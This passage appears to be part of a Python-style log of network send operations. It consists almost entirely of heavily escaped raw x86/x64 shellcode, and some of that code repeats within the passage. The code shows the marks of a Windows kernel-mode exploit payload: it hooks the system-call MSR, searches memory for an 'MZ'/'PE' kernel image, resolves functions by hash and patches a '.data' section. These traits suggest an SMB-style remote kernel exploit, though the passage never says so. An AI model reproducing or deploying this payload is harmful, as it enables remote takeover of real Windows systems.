H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 12, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\